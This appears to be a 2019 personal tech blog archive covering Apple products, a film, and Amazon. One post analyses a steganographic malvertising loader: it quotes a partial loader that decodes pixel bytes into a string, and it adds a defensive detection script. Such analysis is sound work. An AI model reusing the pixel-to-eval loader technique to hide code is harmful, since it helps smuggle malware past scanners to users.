
Tuesday, April 16, 2019

Okay, there are lots of plot holes you could pick on if you wanted, but, minus the space helmet randomness, Captain Marvel actually held together well enough that I wasn’t too distracted watching when I finally caught it this weekend.

Except for one scene: If you’re really a child of the 90s, would you have played Nirvana on a turntable? No. You’re right at the intersection of the decline of the cassette and the ascension of the CD. The record was nowhere in sight.


In Western Europe and North America, the market for cassettes declined sharply after its peak in the late 1980s. This was particularly noticeable with pre-recorded cassettes, the sales of which were overtaken by those of CDs during the early 1990s. By 1993, annual shipments of CD players had reached 5 million, up 21% from the year before; while cassette player shipments had dropped 7% to approximately 3.4 million.[36]


By the 1980s, digital media, in the form of the compact disc, had gained a larger market share, and the vinyl record left the mainstream in 1991.[1]

Nirvana’s height literally marks the least likely time you’d catch your favorite tunes on a turntable.

Very few folks were vinyl hipsters in 1991–4. I realize there are likely some convoluted, retconny explanations someone could dream up, but ultimately they’re fails. Carol “Don’t call me Supergirl” Danvers’ vinyl makes no sense at all.

Which stinks, because the rest of the movie is so clearly a nostalgic trip back to the 1990s. That is, someone wanted us to think that they cared about the 90s, but this vinyl slip-up tells me they were personally strangely hipster or, much more likely, that they weren’t really there.


posted by ruffin at 4/16/2019 11:09:00 PM
Tuesday, March 26, 2019

Looks like the issue is much simpler than that. I have “Unlock with iPhone” turned on.

Can someone wear my watch near me and have it unlock when I unlock my iPhone, thereby getting into my Mac? Might try that out.

I’ve talked about Apple watch security holes before, but here’s an even worse one:

If I turn my watch off before taking it off, and put it on before turning it on, half the time, maybe more, I’m not asked to unlock it before I can use it – for anything.

Maybe it’s got some way of checking my heartbeat to be reasonably sure it’s me, but I really doubt it. I think turning the watch off stops the, “Have I been taken off?” check, and nobody thought to ensure “I absolutely have been taken off,” is set when the watch is turned back on.


posted by ruffin at 3/26/2019 08:37:00 AM
Monday, March 25, 2019

Sounds like an absolute non-story from Apple today. And that’s worse than no story at all.

Look, when Gruber is lambasting you right & left, you’re in trouble, Tim.

UPDATE: Footnote 4 on the Apple Card web page says: “Variable APRs range from 13.24% to 24.24% based on creditworthiness. Rates as of March 2019.” What a crock of [crap] this “low interest rates” line is. Those interest rates are usury, right in line with the rest of the credit card industry. 24% interest ought to be criminal, and 13% is not “low”.

Look, no playing around, this is ludicrous. “Usury” is right. Apple’s letting cash get in front of the business. Stop looking for growth through services, and get out of the loan shark business.

Are magazines still a thing? Didn’t Apple go down this same path with Newsstand back when the iPad first launched?

The whole TV Plus segment felt like a presentation from another company, like Google or Amazon, not Apple. Apple does a good job keeping events moving along, and they tend not to parade a long series of people on stage. This was a parade of a bunch of A-list celebrities — Spielberg! Oprah! — but it just went on and on.


And most importantly:

Why don’t we know what this is going to cost yet?

Wtaf? Come on. If you don’t even know how much you can charge because you’re still hammering out deals with your partners, well… The service isn’t ready yet. You shouldn’t’ve announced a date for a reveal.

What was the purpose of this presentation, anyway? Tell me it wasn’t simply to make good on advertising promises (via Six Colors’ Liveblog):

“Listen, if you make this deal with us to be a launch show, you’re gonna get to pitch your show on stage at Apple to the entire audience of people who watch Apple media events.”

Say it with me Apple: “It’s ready when it’s ready.” These aspirational presentations are really getting on my nerves. Wait until it’s ready. We can wait. Don’t promise AirPower over a year before you have to pretend it never existed. Say what you will about Ping, at least it shipped. (I know, I know. AirPower could come any time now. But would it have really hurt if we didn’t know about it until it did?)

I think it’s close to profit taking time on my Apple stock, if this presentation didn’t crater its price again.


posted by ruffin at 3/25/2019 10:05:00 PM
Monday, March 04, 2019

I’d been meaning to talk about the steganographic macOS exploit for a while. It’s interesting, but doesn’t really seem to warrant the amount of press it got. The TL;DR for it seems to be, “This is a clever hack that briefly brings back the sorts of exploit you saw all over the place five years ago.”

That is, all it does is hide some code that would otherwise have been fingerprinted as an attack. You still have to download something stupid (afaict) to be compromised.

Let’s hit the high points from the security blog post:

Here’s how the exploit operates:

  • Create a Canvas object (this enables the use of the HTML5 Canvas API in order to interact with images and their underlying data.)
  • Grab the image located at: hxxp://
  • Define a function that checks if a specific font family is supported in the browser.
  • Check if Apple fonts are supported. If not, then do nothing.
  • If so, then loop through the underlying data in the image file. Each loop reads a pixel value and translates it into an alphanumeric character.
  • Add the newly extracted character to a string.
  • Execute the code in the string.


All of the landing pages have been observed to force the download of a file named AdobeFlashPlayerInstaller.iso

And here’s the secret code in action that reads from the image and pushes it into an eval:

// Quoted from the analysis. `image`, `ctx` (a 2D canvas context) and `rs` (an
// empty string accumulator) are set up earlier in the loader.
var rs = '';
image['onload'] = function () {
    ctx['drawImage'](image, 0x0, 0x0);                 // paint the fetched image onto the canvas
    var o = ctx['getImageData'](0x0, 0x0, image['width'], image['height']);  // raw RGBA bytes
    for (var p = 0x0, q = 0x0; q < 0x4b; p = p + 0x4, q++) {   // 75 pixels, 4 bytes (RGBA) each
        rs += String['fromCharCode'](o['data'][p + 0x2]);     // blue channel byte -> one character
    }
    // the rest of the quoted function (not reproduced here) hands rs to eval
};

That should do it for you. It treats the image as a data stream, decodes some characters, and evals them. Well, duh.
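The “fingerprint” that the image trick is designed to dodge is exactly the shape above: read canvas pixels, turn bytes into characters, hand the result to eval. An added example (not from the post or the analysis it quotes) of a small static triage check for that shape, run over two constructed sample scripts: one shaped like the loader, and one ordinary grayscale filter that also reads pixels but never executes anything. The indicator names and scoring are this example’s own choices.

```javascript
// Added example: static triage for the "pixels -> string -> eval" loader shape.
// Each indicator is one ingredient of that shape; the three core ones together
// are what makes a script worth treating as suspicious.
const INDICATORS = [
  // canvas pixel access, written as ctx.getImageData(...) or ctx['getImageData'](...)
  { name: 'pixel-read',  re: /getImageData/ },
  // byte-to-character conversion used to rebuild a string from pixel bytes
  { name: 'char-decode', re: /String\s*(?:\.\s*fromCharCode|\[\s*['"]fromCharCode['"]\s*\])/ },
  // dynamic execution of a string
  { name: 'dyn-exec',    re: /\beval\s*\(|new\s+Function\s*\(|\bFunction\s*\(/ },
  // stride-4 walk over RGBA data (p = p + 0x4, i += 4); weak on its own,
  // because every honest image filter does the same thing
  { name: 'rgba-stride', re: /\b\w+\s*(?:\+=|=\s*\w+\s*\+)\s*(?:0x4|4)\b/ },
];

const CORE = ['pixel-read', 'char-decode', 'dyn-exec'];

// Returns the indicators that fired and a coarse verdict:
//   'suspicious' - all three core ingredients present
//   'review'     - some ingredients present (e.g. plain image processing)
//   'clean'      - nothing of interest
function triage(script) {
  const hits = INDICATORS.filter(i => i.re.test(script)).map(i => i.name);
  const verdict = CORE.every(n => hits.includes(n)) ? 'suspicious'
                : hits.length                        ? 'review'
                :                                      'clean';
  return { hits, verdict };
}

// Constructed sample 1: the loader shape from the analysis, with the eval the
// post describes. No real payload; the image never loads here.
const LOADER_SHAPE = `
var rs = '';
image['onload'] = function () {
  ctx['drawImage'](image, 0x0, 0x0);
  var o = ctx['getImageData'](0x0, 0x0, image['width'], image['height']);
  for (var p = 0x0, q = 0x0; q < 0x4b; p = p + 0x4, q++) {
    rs += String['fromCharCode'](o['data'][p + 0x2]);
  }
  eval(rs);
};`;

// Constructed sample 2: an ordinary grayscale filter. It reads pixels with the
// same stride but never builds or executes a string.
const BENIGN_FILTER = `
image.onload = function () {
  ctx.drawImage(image, 0, 0);
  var d = ctx.getImageData(0, 0, image.width, image.height);
  for (var i = 0; i < d.data.length; i += 4) {
    var g = (d.data[i] + d.data[i + 1] + d.data[i + 2]) / 3;
    d.data[i] = d.data[i + 1] = d.data[i + 2] = g;
  }
  ctx.putImageData(d, 0, 0);
};`;

for (const [label, src] of [['loader shape', LOADER_SHAPE], ['grayscale filter', BENIGN_FILTER]]) {
  const r = triage(src);
  console.log(`${label}: ${r.verdict} (${r.hits.join(', ') || 'no hits'})`);
}
```

The benign filter comes back as “review” rather than “clean” because pixel reads and a stride-4 loop are legitimate canvas idioms; the distinguishing ingredient is the string rebuild feeding eval, which is also what a Content Security Policy without 'unsafe-eval' blocks outright. Obfuscators can still split or rename `fromCharCode` and `eval`, so a check like this is triage, not proof.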

Question: Why do browsers still allow eval?

(Okay, there’s probably something where on-demand loading with require, once transpiled (and don’t get me started on transpiled code (which I use all the time professionally, true) or I’ll get out my old man stick and scare you off of my lawn), calls eval, but it seems we could distinguish between libraries loaded and eval’d and strings created on the client so that we could at least get rid of this low-hanging fruit.)

As the blog author says…

Techniques like steganography are useful for smuggling payloads without relying on hex encoded strings or bulky lookup tables.

That’s really all we’re doing… we’re using an image for encoding a payload, and security folks hadn’t thought to sniff those yet. The rest still has to trick you into opening something you didn’t ask for before you’re compromised. That is, there are other checks to prevent immediate failure.

Btw: This is why you have to turn off “Open ‘safe’ files after downloading” in Safari. You can be made to download files, and you don’t want to hand them automatically to another security issue.

This is a natural progression. Not really much to see or learn here past that.


posted by ruffin at 3/04/2019 08:32:00 AM
Saturday, February 23, 2019

Nothing insightful today other than asking why Apple decided to change the MacBook Air’s design.

I bought the 2017 version – the older one, with a slightly bumped CPU & 8 gigs of RAM – new for $750 last year on sale. That’s proving to be a pretty good deal. Then recently we added the 2018 version with two USB-C ports for someone else to use. It’s… fine. It is fine.

But, honestly, I don’t get it. The 2018 MBA’s screen upgrade is great, and extra chassis colors are nice, I guess. I don’t mind the keyboard or trackpad, and smaller isn’t worse, but why not keep the old ports? Swap out the single Thunderbolt for one USB-C on the right of the old design and be done with it.

My only real gripe with the older MBA version was that the login screen had jaggies on it with my non-Retina screen, but a recent upgrade to macOS seems to have fixed that. The 2017 isn’t fast, but it’s quiet, great battery life, a decent keyboard, and does everything I need it to do. You know, everything I need including sharing USB-A jump drives, importing pictures from my camera’s memory card, and working with USB-A keyboards, mice, and docks.

That is, connectivity really makes the older MacBook Air a more useful box when I’m out doing some mobile computing. The first thing we did for the 2018 MBA was add a USB-C to -A adapter, and now it looks stupid with that danged dongle sticking out all the time, but it stays because it’s always being used.

I don’t get it. Why “fix” what’s not broken? Apple’s USB-C fixation really is a textbook proof of, “In theory, theory and practice are the same. In practice, they’re different.”


posted by ruffin at 2/23/2019 08:46:00 AM
Wednesday, February 06, 2019

Isn’t it annoying how Amazon is rediscovering stores? Want it in an hour? Amazon can do that for you – if you’re near a warehouse that already has what you need. Making sure that Amazon warehouse has whatever it is you need now? Isn’t that what conventional stores were supposed to already be doing?

I’m not saying Amazon won’t have improvements over what preceded it (obviously most notably with the ability for goods to share a much more efficient delivery network (though there we’re “just” recreating the USPS)), and Amazon will remain more than a brick & mortar store, but the goal of having products near those that will need them soon is not a new paradigm.

That is, Amazon’s desire to get it to you faster is clearly a case of convergent evolution with your corner store. Wow. Hello 21st century. Incredible.


posted by ruffin at 2/06/2019 07:32:00 AM
Tuesday, January 29, 2019

I missed a reasonably important call at work, and finally decided to start wearing my Series 2 Apple Watch (that I’d gotten last year mainly for running) daily for the more obvious notifications it provides – I usually have my ringer off on my phone, and have the LED flash instead.

In the time I’ve worn the Apple Watch, I’ve noticed two reasonably large security holes.

The first is that the Watch unlocks my MacBook from a surprisingly long way away. I’ve had someone open my laptop and felt the buzz on my wrist from 10–15 feet away. The buzz on my wrist isn’t particularly strong, and, let’s face it, the laptop is still unlocked, potentially out of my sight. If I can undo the login with the watch, that UI is not clear. I’m assuming I can’t.

That’s a problem. This doesn’t quite fit any of the three forms of authentication:

  • There’s nothing I know (like a password),
  • Nothing I am (like a fingerprint), and
  • Not exactly anything I have either (passcode or, in this case, watch).

You just have to be near something I have. Not great.

The second is that, with my watch, my MacBook can now be opened with a four-digit code. I know, I know, we’re now at two forms of auth, something I know (code) and something I have (watch), but I often put my watch down in the middle of the day to have it charge for a few minutes rather than charge it at night. It’d be easy for someone to pick it off the charger, type in four quick digits they caught me entering after charging the day before, and be off. (And I think any reasonably competent pickpocket could lift my single-stud Apple Watch from me.)

It looks like you can use a 5 to 10 digit passcode, which I suppose I should consider. I wonder how many watch owners have noticed that option. I'm sure it was there, but I missed it when I set up my watch. Not sure I'd've thought to use it either before I thought about the flip side of unlocking my Mac.

In any event, the bottom line is that if you like to use your watch to unlock your Mac, you’ve just made your potentially T2-chip-enabled box a lot less secure.


posted by ruffin at 1/29/2019 08:15:00 AM
